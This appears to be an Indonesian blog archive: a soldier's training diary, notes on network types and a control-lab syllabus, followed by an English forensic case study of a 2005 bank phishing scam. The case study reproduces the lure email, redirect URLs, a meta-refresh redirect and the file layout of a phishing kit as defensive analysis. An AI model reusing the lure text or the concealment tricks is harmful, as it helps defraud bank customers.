Selasa, 29 Maret 2022

Suka Duka menjadi Prajurit

 Sukanya kita diajarkan kebersamaan jiwa korsa dan tanggung jawab serta kedewasaan yang tidak pernah ditemukan diinstansi manapun di Indonesia

Dukanya saat orang tua sakit tidak bisa nengok dan moment kebersamaan jarang bisa ikut karena tuntutan tugas dan jauhnya jarak saat dipapua 

Karier Umum

Saya sekolah SD di Purworejo lulus tahun 1999 dan SMP 2002 kemudian lanjut SMK 2005 setelah lulus SMK saya diterima UMPTN di UNY dan UNES saya juga ssebelum lulus sudah diterima di 3 perusahan yaitu PT. AHM, PT ADM dan PT .Showa Indonesia, Mfg. Kemudian saya memutuskan Bekerja di PT. Astra Honda Motor di cibitung Bekasi 2005-2007 setelah dari PT AHM saya kemudian berpindah ke PT Toyota Motor Manufacturing Indonesia di Karawang 2007-2008. kemudian saya saay menjadi TNI melanjutkan Kuliah di  Unmer Malang dan lulus tahun 2013. 

Demikian perjalanan singkat hidup saya

Karir Militer

    Saya masuk tentara di tahun 2008 dan mengikuri pendidikan Bintara di Rindam IV/Diponegoro di Magelang Jawa Tengah  dan lulus pada tahun 2009 kemudian mengikuti pendidikan kecabangan di Pusdikarmed Cimahi setelah selesai pendidikan kecabangan saya masuk ke Disinfolahta dan saya diberikan kesempatan untuk mengikuti Dikbator di Pusdik Pengmilum tahun 2009. Setelah selesai pendidikan saya ditempatkan di Infolahtadam XVII/Cenderawasih di Jayapura Papua. Pekerjaan saya sehari-hari di Infolahtadam XVII/Cen sebagai teknisi komputer dan jaringan areal service Kodam XVII/Cen kemudian saya mengikuti Dikcapa pada tahun 2021 di Secapaad dilanjutkan Dikcabpa Armed di Pusdikarmed dan setelah selesai mendapat penempatan di Pusdikarmed saya menjabat sebagai Dantonwal Denma PUsdikarmed tetapi untuk Tugas sehari-hari di Penerangan Pusdikarmed.

Pendidikan yang pernah saya ikuti selama karir Militer

Diktukba 2008

Dikcabba Armed 2009

Dikbator 2009

Dikbafourier 2010

Poltekad 2010-2013

Diklat Kamjarkom Kemhan 2014

Diklat Cyber Defense Kemhan 2018

Diklat Teknisi Komputer Kemhan 2019

Diktukpa 2021

Dikcabpa Armed 2021

berbagai pelatihan dan penataran di Disinfolahta, mabesad, Mabes TNI dan Umum

SUKA DUKA TAR PDE 2022

    Suka duka saya mengikuti TAR PDE 2022 adalah sukanya tentu bertemu orang-orang baru teman-teman dari berbagai penjuru Kotama dan Balakpus yang ada di Indonesia bertambah relasi itu yang paling perting, dimanapun berada kita tidak akan merasa susah karena ada teman yang kita kenal. dukanya ya saya harus meninggalkan anak istri dimana anak saya lagi seneng-senengnya main dan kata istri tiap hari nungguin ayahnya pulang liat di jendela. 

Implementasi TAR PDE 2022 disatuan

    Dalam pelaksanaan disatuan untuk aplikasi TAR PDE 2022 yang paling mungkin dilaksanakan adalah menyempurnakan google form yang sudah ada untuk kegiatan survey yang dilaksanakan oleh Jianbangdik dan kegiatan untuk Binsat yang ada di Pusdikarmed Pussenarmed

Hasil TAR PDE TA 2022


1. Pada Hari Pertama Kamis 10 Maret 2022 

    Pagi hari pukul 10.00 Wib melaksanakan Pembukaan oleh Sesdis a.n Kolonel Arh Rikas Hidayattullah, S.E.,M.M kemudian dilanjutkan dengan perkenalan gumil dan perkenalan perorangan secara singkat  dan dilanjutkan Pre Test.


2. Pada hari kedua jumat 11 Maret 2022 

    Kita semua membentuk grup discussion dilanjutkan  pelajaran materi ICT oleh gumil mulai dari sejarah ICT dan perkembangannya dilanjutkan sejarah komputer dan perkembangan komputer sampai saat ini dilanjutkan dengan pengetahuan internet dan sedikit IOT. kemudian membuat tugas dalam bentuk tulisan atau paparan tentang pengertian ICT, asal muasal ICT, perkembangan ICT, komponen Komputer, sejarah komputer, penggunaan komputer pada masa ke masa dan konsep sistem komputer


3. Paga hari ketiga senin 14 maret 2022 

    Mempelajri pengenalan Microsoft Word dengan materi menu pada Ms. Word toolbar dan pengertian dilanjutkan dengan praktek tugas menulis pre test, menulis paparan tentang ICT yang sudah dipaparkan ke bentuk Word dilanjutkan dengan membuat/menulis ulang sprin/contoh sprin 


4. Pada Hari keempat selasa 15  Maret 2022 

    Gumil mengenalkan tentang materi Ms. Excel dengan memperkenalkan menu dan toolbar kemudian diajarkan rumus dalam Ms. Excel oleh gumil contohnya tentang penjumlahan ,pengurangan,pembagian dan perkalian dengan rumus yang berbeda-beda contoh rumus penjumlahan atau Total =Sum(....), nilai rata-rata =Average(.....), nilai tertinggi=Max(....), nilai terendah=Min(...) if dan logika penghitungan di ms. excel (-,+, *, /, %)


5. Pada hari kelima rabu 16 Maret 2022 

    Gumil mengajarkan tentang Ms. PPT, pengenalan menu dan toolbar pada ms power point dan cara membuka atau melihat slide dengan cepat dengan cara membuat hyperlink dan setiap slidenya dikasih hyperlink biar untuk memudahkan kita mencari slide yang akan kita buka atau kita tampilkan diakhiri dengan tugas membuat slide yang berisi biodata dan link dalam bentuk diagram, bagan foto video dll.


6. Pada hari keenam kamis 17 Maret 2022 

    Gumil mengajarkan kita tentang Kegunaan Google Drive kemudian yang belum punya cara maka diajarkan cara membuat google drive,menyimpan file didalam google drive dengan cara login gmail kita masih-masih dahulu dan untuk memudahkan kita dimana pun tempat untuk mencari file kita masing-masing. untuk tugas google drive yaitu membuat folder dan didalamnya berisi folder materi yang sudah dilaksanakan dan diupload seluruh materi dan tugas yang telah dilaksanakan sesuai dengan folder yang sudah dibuat 


7. Pada hari ketujuh Jumat 18 Maret 2022 

    Gumil mengajarkan kita tentang kegunaan Google Docs adalah sebagai salah satu layanan clound computing berbentuk  dokumen dari google yang bisa diakses secara online. disini diberikan pelajaran cara kerja secara teamwork dengan share file ke teman ini bisa diterapkan oleh kita semua di satuan untuk penerapan paperless dan dapat dikerjakan dimanapun yang penting tersedia internet.


8. Pada hari ini Senin tanggal 21 Maret 2022

    Gumil memberikan tugas latihan latihan bagaimana secara bersama sama menggunakan Google Doc yang terbagi dalam tim maupun perorangan.


9. Pada hari ini Selasa tanggal 22 Maret 2022

    Gumil memberikan tugas latihan latihan bagaimana secara bersama sama menggunakan Google Slide yang terbagi dalam tim maupun perorangan. Fungsi google slide sendiri lebih multi tasking.


10. Pada hari ini Rabu tanggal 23 Maret 20022

    Gumil memberikan tugas latihan latihan bagaimana mebuat Google Form dimana diajarkan cara membuat Survey dan mempelajari menu didalamnya.


11. Pada hari ini Kamis tanggal 24 Maret 2022

    Gumil memberikan tugas latihan latihan bagaimana mebuat Mail Merge dimana diajarkan cara membuat surat secara cepat dengan menggunakan menu mail merge dan bisa terkoneksi dengan Ms. Excel.


12. Pada hari ini Jumat tanggal 25 Maret 2022

    Gumil memberikan tugas latihan latihan bagaimana mebuat Flowchart dimana diajarkan cara membuat flowcart sesuai dengan alur program yang akan kita buat


13. Pada hari ini Senin tanggal 28 Maret 2022

    Gumil memberikan tugas latihan latihan bagaimana mebuat Blog dimana diajarkan cara membuat sebuah blog dengan domain blogspot.


Senin, 28 Maret 2022

Jaringan Komputer

 


Jenis–jenis jaringan komputer 

1. PAN (Personal Area Network) Jenis jaringan ini mencakup wilayah yang lebih kecil, misalnya saja pada kantor, dan rumah. Biasanya, banyak digunakan hanya untuk keperluan internet, serta printer. Dan tidak memerlukan resources yang besar untuk menggunakan jaringan PAN. 

2. LAN (Local Area Network) Jaringan LAN berfungsi untuk menghubungkan perangkat jaringan dalam kondisi jangkauan yang relatif kecil. Contoh penerapan jaringan LAN yaitu sistem jaringan pada sekolah, kantor, maupun rumah. Banyak orang yang cenderung menggunakan konektivitas tertentu, terutama pada token ring dan ethernet. Selain itu, LAN juga menyediakan teknologi jaringan wireless dengan menggunakan WIfi dan lebih dikenal dengan WLAN (Wireless Local Area Network). 

3. CAN (Campus Area Network) Jaringan CAN dapat dibilang memiliki kesamaan dengan MAN, namun lebih terbatas dalam ruang lingkup kampus atau akademisi. Untuk jaringan ini, lebih banyak digunakan untuk keperluan praktek lab, email, pembaruan kelas, dan lain sebagainya. 

4. MAN (Metropolitan Area Network) MAN adalah jaringan yang menghubungkan antara satu perangkat komputer dengan perangkat yang lain dalam ruang lingkup kota pada jaringan yang sama. Jenis jaringan ini lebih besar dari dari jaringan LAN. 

5. WAN (Wide Area Network) WAN merupakan kumpulan dari LAN yang tersebar secara geografis. Jaringan WAN cenderung untuk menggunakan teknologi seperti ATM, X.25, serta Frame Relay untuk konektivitas jarak yang lebih jauh lagi. 

6. Internet Internet adalah jaringan komputer terbesar yang pernah diciptakan oleh manusia. Ruang lingkup dari internet mencakup hampir seluruh penjuru dunia. Siapapun dapat mengakses berbagai sumber informasi dalam berbagai perangkat komputer, seperti PC, smartphone, laptop, tablet, TV, dan lain sebagainya. 

7. VPN (Virtual Private Network) VPN merupakan salah satu solusi untuk menyediakan koneksi internet yang lebih aman. VPN dapat membuat jalur aman untuk kebutuhan transmisi data. Saat ini, banyak sekali platform yang menjual VPN secara gratis, maupun menyediakan akses premium.  Jaringan Komputer Berdasarkan Jenis Transmisi Berdasarkan bentuk fundamentalnya, jaringan komputer terbagi menjadi dua jenis, yaitu jarak dan transmisinya. 

Berikut ini terdapat dua jenis klasifikasi jenis computer network berdasarkan transmisinya. 

1. Broadcast Jaringan broadcast merupakan saluran komunikasi tunggal yang digunakan secara bersama – sama oleh beberapa perangkat (device) yang saling terkoneksi ke jaringan yang sama. Paket merupakan pesan berukuran kecil yang dikirim oleh suatu mesin menuju mesin yang lainnya. Field dari alamat berisi keterangan mengenai kepada siapa tujuan paket tersebut akan dikirimkan. Apabila paket tersebut tertuju kepada dirinya maka akan segera diproses. Jika paket terkirim ke mesin yang lain, maka mesin otomatis akan mengabaikannya. 

2. Point-to-Point Jenis yang kedua adalah jaringan point-to-point tersusun atas beberapa koneksi pasangan individu, dari satu perangkat menuju perangkat yang lain. Untuk dapat mengirim sebuah paket ke tujuan alamat, maka perlu untuk melewati beberapa mesin perantara. Sehingga, sering kali akan melewati banyak route yang kemungkinan berbeda jarak. Oleh karena itu, algoritma route sangat memegang peranan penting pada jaringan ini. 

Topologi jaringan komputer 

1. Bus Topologi bus merupakan topologi yang mempunyai kabel tunggal yang masing – masing workstation dan server saling terhubung. Kelebihan dari topologi bus sendiri yaitu ketika melakukan pengembangan jaringan dan workstation baru, akan tetapi tidak mengganggu workstation yang lain. Kekurangan yang dimiliki adalah ketika kabel mengalami kerusakan atau putus, maka akan mengalami gangguan pada keseluruhan jaringan. 

2. Ring (cincin) Topologi ring atau cincin merupakan topologi yang terbentuk ketika semua perangkat telah terhubung, sehingga menyerupai cincin atau berpola lingkaran. Jadi, setiap workstation akan menerima informasi dari satu perangkat ke perangkat lain.  Kelebihan dari topologi ring adalah tidak akan terjadi collision atau tabrakan antar data. Sedangkan, kekurangan dari topologi ini adalah jika salah satu node mengalami permasalahan, maka keseluruhan jaringan akan mengalami gangguan.  

3. Star (bintang) Topologi star atau bintang merupakan topologi yang masing – masing workstation memiliki jalur yang terhubung langsung melalui server atau hub. Kelebihan dari topologi ini, adalah jika salah satu workstation mengalami gangguan, maka tidak semua jaringan akan mengalami hal yang sama. Dikarenakan, setiap workstation memiliki jalur atau kabel sendiri. Kelemahan dari topologi star adalah membutuhkan biaya yang besar, karena membutuhkan sumber daya kabel yang banyak.  

4. Tree (pohon) Topologi tree merupakan gabungan dari topologi star dan bus. Topologi jaringan ini menyerupai bentuk akar pohon, yang dapat dibilang hanya perangkat hub saja yang terhubung langsung menuju bus pohon. Dan setiap hub berfungsi sebagai akar dari pohon. Kelebihan dan kekurangan dari topologi tree sama dengan topologi bus dan star. Namun, dengan menggunakan jaringan pohon ini (hybrid), mendukung adanya perluasan jaringan yang lebih baik. 

5. Mesh Topologi mesh sering dipakai ketika terdapat suatu kondisi dimana tidak adanya hubungan komunikasi yang terputus secara absolut antar node dalam sebuah jaringan komputer. Antar perangkat akan terhubung secara langsung selama masih dalam jaringan yang sama. Kelebihan dari topologi mesh adalah komunikasi antar komputer yang lebih cepat, serta keamanan yang lebih terjamin. Kekurangan dari topologi mesh adalah memerlukan biaya yang lebih besar dalam penyediaan kabel.  Macam–macam perangkat jaringan komputer Sekarang, telah banyak dikembangkannya berbagai macam perangkat jaringan komputer untuk membantu dan mengoptimalkan kinerja sistem jaringan. 

Berikut ini merupakan beberapa macam perangkat yang sering Anda jumpai dan Anda gunakan. 

1. Server Server berfungsi sebagai tempat atau media untuk menyimpan informasi, serta mengelola jaringan komputer. Server memiliki spesifikasi yang lebih tinggi dari client. Karena tujuan dari dibuatnya server memang untuk melayani komputer client. 

2. NIC (Network Interface Card) NIC dapat disebut juga dengan LAN Card Expansion Board yang digunakan supaya komputer dapat terhubung dengan jaringan. Ethernet terbagi menjadi empat jenis, yaitu ethernet (10 Mbit/detik), fast ethernet (100 Mbit/detik), gigabit ethernet (1000 Mbit/detik), dan tengig (10000 Mbit/detik). 

3. Kabel jaringan Kabel merupakan media untuk menghubungkan satu perangkat dengan perangkat yang lain. Terdapat beberapa jenis kabel untuk pembuatan saluran jaringan. Diantaranya adalah kabel coaxial, fiber optic, dan twisted pair. 

4. Hub dan Switch Switch merupakan perangkat jaringan komputer yang berfungsi untuk menghubungkan beberapa komputer. Secara fisik, bentuk dari switch sama dengan hub, namun jika dilihat dari sisi logika switch sama dengan bridge. Switch memiliki dua tipe, yaitu unmanaged switch yang merupakan tipe termurah. Dan managed switch yang merupakan tipe termahal.  

5. Router Router adalah perangkat jarkom yang berfungsi untuk menghubungkan jaringan LAN ke dalam suatu jaringan WAN, serta mengelola lalu lintas dari data di dalamnya. Router dapat menentukan jalur terbaik, karena memiliki tabel routing untuk melakukan pencatatan terhadap semua alamat dalam jaringan. 

6. Bridge Bridge adalah sebuah piranti yang digunakan untuk meneruskan lalu lintas antara segmen jaringan berdasarkan informasi pada sebuah data link. Bridge juga memiliki fungsi untuk membagi jaringan yang besar menjadi beberapa jaringan kecil. 

7. Modem Modem merupakan perangkat yang digunakan untuk menghubungkan antara perangkat komputer, dengan penyedia layanan internet atau disebut juga dengan Internet Service Provider (ISP). 

8. Repeater Repeater adalah suatu perangkat yang berfungsi untuk memperkuat dan meregenerasi jaringan dan sinyal yang masuk. Repeater berusaha untuk mempertahankan integritas dari sinyal jaringan. Kelemahan dari repeater sendiri adalah tidak dapat melakukan filter traffic dalam jaringan. 

9. Wireless card Wireless card merupakan perangkat yang wajib digunakan apabila anda ingin terhubung dalam jaringan nirkabel. Rata – rata komputer jenis terbaru sudah menggunakan perangkat yang mendukung wireless card. Namun, anda juga bisa menambahkannya sendiri pada komputer anda.  


Sumber: https://mediaindonesia.com/teknologi/433330/jaring


an-komputerpengertian-jenis-transmisi-dan-topologi

Jumat, 25 Maret 2022

LABORATORIUM SISTEM KENDALI DIGITAL



MATERI:

 

LAB 01 : Respons Waktu dari Sistem

§  Menunjukkan bagaimana pole dan zero dari fungsi alih sistem berhubungan dengan respons domain waktu.

§  Mengerti pole-pole dominan

 

LAB 02 : Identifikasi Sistem

§  Mengenali fungsi alih untuk model suatu sistem

§  Mendemonstrasikan pengaruh-pengaruh ketidak-linieran

§  Mengerti proses dari identifikasi sistem

 

LAB 03 : Waktu Sampling

§  Mengamati pengaruh interval waktu sampling pada respons

 

LAB 04 : Analisis Root Locus

§  Mendemonstrasikan konsep root locus yang dipakai untuk sistem yang telah diidentifikasi

§  Mengamati pengaruh penempatan pengendali dalam arah forward v. Feedback.

§  Mengevaluasi pengendali proporsional yang potensial.

 

LAB 05 : Desain Pengendali PID untuk Sistem

§  Mengerti pengaruh kombinasi dari pengendali proporsional, integral dan derivative.

 

LAB 06 : Desain Kompensator dengan Root Locus

§  Desain sebuah kompensator untuk sistem yang diidentifikasi yang menghasilkan sistem loop tertutup dengan pole-pole yang diinginkan.

§  Mengamati pengaruh penempatan kompensator pada dinamika loop tertutup.

Case Study 1: Tidball




This case study describes a pair of phishing attempts that took place in early 2005. For reasons that will become apparent, I refer to the individual, or group, responsible for the scam as Tidball.

1. The Initial Emails

It started out with an email, dated 29 January 2005, that appeared to be from Washington Mutual Bank and that included the following text.

We recently have determined that different computers have logged onto your Washington Mutual Bank Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by Feb 01, 2005, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner.

This looked like a typical phishing email and included a link to a fake Washington Mutual Bank page where I was encouraged to log in and then enter personal information such as my credit card number, date of birth, and so on.

The most interesting part of an email message like this is usually the URL of the fake bank site. But it always worth perusing the text of the message and the headers for anything that looks unusual. Minor details can serve as signatures and finding them elsewhere can create strong connections between seemingly unrelated scams.

The first email had several clues that I was able to make use of later on. The first clue lay at the start of the first sentence in the body of the email in the phrase "We recently have determined..." It can be dangerous for an author to comment on another's use of the English language, but this looked odd to me, so I made a note of it. Next I turned to the headers for the message:

    Return-Path: <support@wamu.com>

    Received: from web.mywebcompany.com (mywebcompany.com [64.239.179.50]

          by gateway.craic.com (8.11.6/8.11.6) with SMTP id j0TEAbl09958

          for <myemailaddr>; Sat, 29 Jan 2005 06:10:37 -0800

    Received: from vswz (21.221.56.17)

          by web.mywebcompany.com; Sat, 29 Jan 2005 06:10:38 -0800

    Date: Sat, 29 Jan 2005 06:10:38 -0800

    From: <support@wamu.com>

    X-Mailer: The Bat! (v2.01)

    Reply-To: <support@wamu.com>

    X-Priority: 3 (Normal)

    Message-ID: <35567962.20040419010559@wamu.com>

    To: <myemailaddr>

    Subject: Notification: Washington Mutual Bank

    MIME-Version: 1.0

    Content-Type: multipart/mixed;

     boundary="----------50411716B3"

 

I described email headers in detail in Chapter 3, stressing how easily they can be forged. The one piece of data that can be relied on is the IP address in the first Received header line, which in this case is 64.239.179.50 and which reverse maps to mywebcompany.com. The form of the Message-ID and content boundary lines can sometimes serve as unique signatures so they are worth noting for future use. In this example, the X-Mailer header was clearly unusual and worthy of some follow up:

    X-Mailer: The Bat! (v2.01)

 

A Google search revealed that The Bat! is the name of a legitimate email client that runs on Windows systems and that is sold by a company based in the Republic of Moldova. It appears to have no connections to bulk mailing software. The name is very distinctive, and I had never heard of the software prior to this email, so I noted this header as a potential signature.

At this point, I moved on to the URL of the web site that was contained in the message. But before I describe where that path led to, I want to introduce the second example of this scam. By discussing both of them in parallel, I can better illustrate the discovery process.

The second email was dated 14 February 2005 and was received from the same IP address as the first:

    Return-Path: <security@wamu.com>

    Received: from web.mywebcompany.com (mywebcompany.com [64.239.179.50]

          by gateway.craic.com (8.11.6/8.11.6) with SMTP id j1ED9Kl08865

          for <myemailaddr>; Mon, 14 Feb 2005 05:09:20 -0800

    Received: from chlzgm (160.136.116.228)

          by web.mywebcompany.com; Mon, 14 Feb 2005 05:09:20 -0800

    Date: Mon, 14 Feb 2005 05:09:20 -0800

    From: <security@wamu.com>

    X-Mailer: The Bat! (v2.01)

    Reply-To: <security@wamu.com>

    X-Priority: 3 (Normal)

    Message-ID: <224921472.20040416151929@wamu.com>

    To: <myemailaddr>

    Subject: Washington Mutual Bank

    MIME-Version: 1.0

    Content-Type: multipart/mixed;

     boundary="----------2A73EC7EC927"

 

The second Received header lines were different between the messages, as were the Message-ID and content boundary headers. This is not a surprise, since these are routinely forged in spam messages. However, the X-Mailer header referred to the same distinctive software as the first message.

The body of the message was largely identical with the exception of the cutoff date, by which I was supposed to update my account and the URL of the target web site.

2. The Initial URLs

The URLs included in the emails point to two different sites. As I will describe, all the sites that are involved in the scam appear to have been hijacked by Tidball. To protect these innocent bystanders, I have modified their IP addresses and domain names in the examples that follow. In place of the IP address 10.0.0.1, for example, you will see 10.0.x.x.

The URL given in the first email was:

http://64.157.x.x/csBanner/banners/realstat. php?PROGID=stat3214&MAILID=73&MakeCopy=0&GetCopy=0&GROUPID =261&EMAILADDR=noaddr&REDIRURL=http://216.130.x.x/cgi-bin/sblogin/ receive.pl.

The second message contained a link to this URL:

http://66.70.x.x/stat/realstat. php?PROGID=stat3214&MAILID=73&MakeCopy=0&GetCopy=0&GROUPID =261&EMAILADDR=noaddr&REDIRURL=http://216.242.x.x/_notes/text7.htm. mno.

These illustrate an important point when you are investigating a scam or looking at the structure of a web site. It is easy to get sidetracked by interesting details before you have taken in the big picture. These two URLs are full of information, and I will return to them shortly, but the first priority is to visit the site that they lead you to. In the world of traditional forensics this would be like fixating on a tire track when the car itself has been abandoned just around the corner.

But at the same time, you must not forget all those interesting details that you encounter along the way. Make sure you take plenty of notes so that you can revisit them later on. In some cases, the amount and diversity of information that you uncover can be overwhelming, but small details can turn out to be very significant.

These two URLs took me to a fake Washington Mutual Bank home page, located on two different sites. But neither of these final URLs matched the original ones, so clearly there was some form of redirection going on. Both examples of the bank site looked identical, which suggested a common point between the two paths being followed by these scams. That looked like a good break point at which to revisit the original URLs and to understand the redirection mechanism that being used.

3. Redirection

Stripping off the CGI parameters from the original URLs makes them easier to understand:

They both invoke a PHP script called realstat.php that redirects visitors to a second URL. The script takes five parameters: PROGID, MAILID, MakeCopy, GetCopy, GROUPID, EMAILADDR, and REDIRURL. The values passed to these are identical in both examples, with the exception of REDIRURL, which has two different URLs for its values.

Given a name and a bit of context, you can often make an educated guess about the function of a program or parameter because developers typically choose names that are indicative of their function. It's just easier that way. A reasonable guess is that realstat.php was involved in tracking visitors to web sites. Searching for the script name on Google turns up a few hits, some to other scams in this series, but none to pages that describe its origin and function.

Clues to that may lie in the directory in which the script resides. So it is always worth truncating URLs back to the directory name and seeing if the server returns a listing of its contents. That was the case with both of these sites. Figure 11-1 shows a listing equivalent to these. This was actually taken from another example of the scam as I failed to save listings from the original sites, but the contents are almost identical.

The directory contains two PHP scripts and several log files, all with "3214" in their names. I can see that realstat.php is a small script, less that 2 Kbytes, but I cannot access its source code. However, I can look at those log files and see that they contain many lines like this:

    73:L    261    noaddr

 

Figure 1. Listing of a directory that contains realstat.php

 

This is not very informative in itself but the pieces of information match exactly with the parameters passed to the script in the original URLs. The parameter PROGID was set to stat3214, which shows up in the log file names. MAILID is set to 73, GROUPID is set to 261, and EMAILADDR is set to noaddr, all of which show up in the log file records. This suggests to me that realstat.php is a legitimate script that is used to track visitors to a web site or perhaps track response to some form of email campaign. The script logs the information and then redirects visitors to the target page that they want to visit.

Tidball has discovered the redirect feature and has performed some form of search looking to find sites that make the script available. Alternatively the sites may have been broken into and the script put in place. Either way, owners of these sites were probably unaware of the vulnerability.

The rationale behind using the script is presumably to confuse spam filters that might register the original URLs. It certainly doesn't do much to obscure the redirection as the target URLs are included right there as parameters to the script:

But these were not the URLs of the final fake bank pages, so there was another redirection step involved. Visiting either of these in a browser took me to the fake pages, so that did nothing to uncover the mechanism that was being used. This is where wget is really useful, using the -S option to capture the HTTP headers. Here are those for the first of the two examples, with some headers removed for the sake of readability:

    http://64.157.x.x/csBanner/banners/realstat.php?PROGID=stat3214&

    MAILID=73&MakeCopy=0&GetCopy=0&GROUPID=261&EMAILADDR=noaddr&

    REDIRURL=http://216.130.x.x/cgi-bin/sblogin/receive.pl

    [...]

     1 HTTP/1.1 302 Found

     2 Date: Sat, 29 Jan 2005 19:03:59 GMT

     3 Server: Apache/1.3.33 (Unix) PHP/4.3.9

     4 X-Powered-By: PHP/4.3.9

     5 Location: http://216.130.x.x/cgi-bin/sblogin/receive.pl

    [...]

     1 HTTP/1.1 302 Found

     2 Date: Sat, 29 Jan 2005 19:08:04 GMT

     3 Server: Apache/1.3.26 (Unix) PHP/4.3.10

     4 Location: http://64.157.x.x/autorank/images/.../template/logon.htm

    [...]

     1 HTTP/1.1 200 OK

     2 Date: Sat, 29 Jan 2005 19:03:59 GMT

     3 Server: Apache/1.3.33 (Unix) PHP/4.3.9

    [...]

    10 Content-Type: text/html

    [...]

    11:04:00 (65.90 KB/s) - `logon.htm' saved [27755/27755]

 

Before editing, header logs like these can be quite confusing. Look for the HTTP/1.1 lines that always come first in each block of headers. This example has three distinct blocks. The first is the response from the site that contains realstat.php in the original URL. The 302 code in the first header shows that I am being redirected. The X-Powered-By line confirms that a PHP script is responsible for this, and the Location header tells me where I am headed.

The second block is the response from 216.130.x.x, and its 302 code tells me that I am again being redirected. Its URL suggests that it is a Perl script. The Location header again tells me where I am being redirected to. In this case, it defines an HTML page on 64.157.x.x, which is the same server that I originally came from!

This would seem to be a pointless cycle of redirection, especially since some effort has been required to set up redirection on 216.130.x.x. This may have been done for the sake of obfuscation, or it may give Tidball the flexibility to redirect browsers to alternative sites as the initial ones are taken down, once the scams are uncovered.

The redirection in the second example is slightly different. At face value, text7.htm.mno looks a note file created by Macromedia Dreamweaver. In fact it contains nothing but the following text:

    <META http-equiv="refresh" content=" 0;

    url=http://66.230.x.x/socal/party3_5/template/logon.htm">

 

A tag like this would normally be found within the HEAD block of a regular HTML file, in which case they will serve to redirect any browser to the new URL. Using the tag by itself works with Internet Explorer and Safari, but not with Firefox. Unlike the first example, this redirection takes you to a different site.

While the use of realstat.php may represent the simple hijacking of a script that was already in place, the second redirection step required Tidball to access both sites and insert files that contained the target URLs.

4. The Web Sites

The two fake bank web sites that I was redirected to were identical. The initial page asked me to log in to my account at the bank. Submitting a fake username and password returned a second page that asked for a broader range of data such as date of birth and credit card number. Submitting that page, with fake data of course, took me to the real bank site. That is how a typical phishing site operates and in itself is not particularly interesting. More of a challenge is figuring out where the site is located and, if you are lucky, learning something about its structure and operation.

Here are the URLs of the two sites:

You can learn something from a single piece of data, but being able to compare two different examples can tell you so much more. That is the case here. Both URLs point to the same file, logon.htm, and I know from visiting the sites that these appear to be identical. The directories that contain the files also share the same name, template, but the preceding parts of the URLs are totally different. Not only that but the first site places the template directory four levels down from the document root, whereas the second example places it three levels down. If the site were set up to run this specific scam, then you would expect the login page to be in a top-level directory, not buried deep within the site.

These details suggest that the sites have been broken into by Tidball, with the fake bank sites being set up surreptitiously.

5. Directories

Given the multiple levels of directories involved in the two sites, an obvious next step was to see if the servers would provide listings for any of the directories and indeed they did.

Both host web sites, into which the phishing sites had been inserted, turned out to be pornography sitesI will spare you the details of those. In both sites, one of the directories in the path contained a large number of thumbnail images. A copy of the template directory had been placed into these in such a way as to not attract attention from the operator of the site if they were to casually look at the listing, either from the Web or from a Unix shell on the server itself.

Although I do not frequent this type of web site, I understand that many of them buy sets of imagesalong with the software to manage and display themfrom companies that cater to this lucrative market. Tidball found a way to break into these sites, which exploits some vulnerability in this software. In fact, I believe I know exactly how this was achieved. A Google search with the appropriate query term leads to a detailed description of the exploit. I won't broadcast that any further here.

The choice of a directory with a large number of files makes good sense if you want your directory to remain unnoticed. In the 64.157.x.x example, a directory called ... had been inserted into the images directory. This unusual name was chosen because it will not appear in server directory listings or in a basic Unix shell listing from the command ls. This is the case for any directory that begins with a period, although these are revealed by ls -a.

In the 66.230.x.x example, a directory called party3_5 was placed into the directory socal, which contained a large number of images with names such as party3_4.jpg, party3_6.jpg, and so on. So the name would blend into the background in a quick glance at the directory listing. This concealment of directory names adds weight to the idea that the sites had been attacked and compromised by Tidball.

Although the name of directory ... is hidden in the server listing of the images directory that contains it, its contents could be viewed from the URL http://64.157.x.x/autorank/images/.../. I used that example in Chapter 5 and the listing is shown in Figure 5-6. This was one of the fortunate instances where the scammer has left behind a file called template.tar, containing all the files that are used to create the fake site.

Leaving behind a file like this was a major mistake on the part of Tidball. The error was repeated on the second phishing site, allowing me to retrieve two versions that I could then compare. The contents proved to be most revealing.

6. The Phishing Kit

Saving the file template.tar from 64.157.x.x to a local directory and unpacking it produced the following set of files:

      659 Jan 13 13:47 confirm.php

    35713 Jan  2 06:08 SecurityMeasures.php

    27755 Nov 17 21:15 logon.htm

    36378 Nov  1 01:25 Common00.js

    13268 Nov  1 01:25 IEWin000.css

       43 Nov  1 01:25 1px_clea.gif

       61 Nov  1 01:25 1px_main.gif

       43 Nov  1 01:25 1px_whit.gif

      686 Nov  1 01:25 accountc.gif

       36 Nov  1 01:25 blueline.gif

      593 Nov  1 01:25 btn-crea.gif

      289 Nov  1 01:25 btn-logo.gif

      612 Nov  1 01:25 customer.gif

      675 Nov  1 01:25 loanscre.gif

      418 Nov  1 01:25 logo-equ.gif

      126 Nov  1 01:25 logon_yb.gif

      125 Nov  1 01:25 logon_yc.gif

      129 Nov  1 01:25 logon_yt.gif

      129 Nov  1 01:25 logon_yu.gif

      718 Nov  1 01:25 onlineba.gif

     1186 Nov  1 01:25 personal.gif

      509 Nov  1 01:25 secure_b.gif

     1706 Nov  1 01:25 wamucom_.gif

       36 Nov  1 01:25 whitelin.gif

 

Most of these represent image files that have been copied from the legitimate bank web site. The three important files for our purposes are logon.htm, SecurityMeasures.php, and confirm.php.

The first of these is a copy of the bank user login page, which asks for your account name and password. This leads you to SecurityMeasures.php, which asks you to enter your personal details into a form. That in turn is processed by confirm.php, which then redirects you to the real bank site. This is the typical way a phishing site is set up. To appear legitimate, it uses a page copied from the real site, with minor modifications. By leading you to the "real site," it may reassure some of its victims that it is not a scam. The overall structure is not that interesting but, because the source code for the PHP files was so kindly provided in the tar file, I was able to take the analysis to another level. But before describing those, there was a bonus waiting to be uncovered in the initial HTML page.


 

7. Page Tracking Information

Web pages for banks tend to be relatively sophisticated with complex formatting and corporate logos and images. That leads to voluminous and often unreadable HTML source for those pages. Pages for fake sites are invariably copied from the real site and then modified to suit the needs of the scam. In looking at these pages, the temptation is to search for a FORM tag, figure out the URL of the associated script, and ignore the rest of the page. But doing so can lead you to miss some gems of information.

Many of the large company sites track visitors to their sites using cookies. But because some users disable these, several other mechanisms have been developed. In one of these, the downloaded page includes an IMG tag that loads a tiny transparent image from a tracking server that is effectively invisible. However, this image is not retrieved directly from a file, rather it is passed from a server-side script. The name given to the image in the web page includes a set of parameters, which are stripped off and logged by the server.

